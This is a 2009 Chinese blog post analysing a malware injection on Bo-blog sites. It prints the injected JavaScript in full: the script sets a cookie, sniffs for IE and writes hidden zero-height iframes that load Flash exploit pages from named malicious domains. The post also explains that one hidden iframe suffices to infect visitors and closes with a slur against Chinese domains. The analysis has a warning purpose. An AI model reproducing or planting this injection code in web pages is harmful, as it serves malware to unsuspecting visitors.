IE、IE、还是IE!IFRAME导致中毒!!! Unknown 2009/03/06

| |

最近听闻Bo-blog有人被挂马了,被加上了一个http ://ccj1.cn/的网址(<-请大家不要随便访问这个网址,尤其是IE!!!)。

我用Flashget下载了这个网址,得到如下的首页代码(请不要随便点击下面的网址!!!):

下面的代码是纯Javascript,不知道为何Firefox会直接解释呢?

追记:后来测试了几种情况,弄明白了,不是说这段代码有什么特殊的功能。是否能完成Cookie的验证,我都怀疑。怀疑这个SB忘了在前后加上<script></script>标记。但为什么会引起病毒,是因为网页的代码(别管是HTML代码还是JS代码)中,只要出现<iframe src=''></iframe>,IE和Firefox就会试图载入这个页面(这段代码不是啥JS,因为它没有用<script></script>括起来。说穿了,只要写一句<iframe src='virus_page'></iframe>,访问者就会中病毒!)。只是IFRAME里的SRC页面就是用Flash特制的病毒页面罢了。

function init()
{window.status="";}

window.onload = init;

if(document.cookie.indexOf("play=")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();

if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write("<Iframe src=http://www.sb8632.cn/a1/ilink.html width=100 height=0></Iframe>");
}
else
{
document.write("<Iframe src=http://www.sb8632.cn/a1/flink.html width=100 height=0></Iframe>");
}
}

document.writeln("<Iframe src=http:\/\/www.bg9980.cn\/b2.htm width=50 height=0><\/iframe>")

我是用Firefox试的,打开上述网址,Firefox会提示这是一个病毒网址。一般人是不会继续访问了,不过我比较好奇,强行继续访问。果然,一会儿Firefox死掉了,接着Norton就跳出来报告病毒了。

很奇怪,代码是用IFRAME嵌入的。如果直接以网址访问打开 http ://www.sb8632.cn/a1/flink.html,Firefox就不会中毒。但如果用IE访问的话,放心吧,你肯定会中毒的。所以,我再次提示各位:不要随意点击上面的广址!

看来这个IFRAME功能实在是太麻烦,怪不得当初Firefox是很不情愿支持IFRAME功能。分析了一下IFRAME网址中的代码,似乎是通过Flash代码执行病毒代码的。看来Flash功能强大也不是啥好事。

最后,这个病毒网址是.cn的,怪不得中国域名就是垃圾!估计用WHOIS查询也查不到是哪个贱人注册的。

请给这篇日志评个分吧~!

本文评分: 5.5/10 (19 votes)    提示:您还未对本文评分,您可以进行评分并发表您的意见!

加入收藏!

Tags: , , , , , ,
发表评论

昵称

网址

电邮

打开HTML 打开UBB 打开表情 隐藏 记住我 [注册]